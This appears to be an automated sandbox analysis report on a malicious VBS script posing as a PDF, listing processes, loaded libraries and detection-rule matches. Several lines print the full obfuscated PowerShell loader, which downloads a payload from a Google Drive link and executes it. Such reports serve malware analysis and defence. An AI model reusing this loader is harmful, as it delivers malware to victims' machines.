erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHH
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHHJump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB091CD024_2_00007FFCB091CD02
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB091BF564_2_00007FFCB091BF56
              Source: DIR-A_JY4878249#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6347
              Source: unknownProcess created: Commandline size = 6347
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6347Jump to behavior
              Source: amsi64_6344.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_5904.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6344, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5904, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/13@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Foremilks.sigJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-CPQ85K
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhhh1yyd.15l.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6344
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5904
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: DIR-A_JY4878249#U00b7pdf.vbsVirustotal: Detection: 9%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHH
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHH
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHHJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
